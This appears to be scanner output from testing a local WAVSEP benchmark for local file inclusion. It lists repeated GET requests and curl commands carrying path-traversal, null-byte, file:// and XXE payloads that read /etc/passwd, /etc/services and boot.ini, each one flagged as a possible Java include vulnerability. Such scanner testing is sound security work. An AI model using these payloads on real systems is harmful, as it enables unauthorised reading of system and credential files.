curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
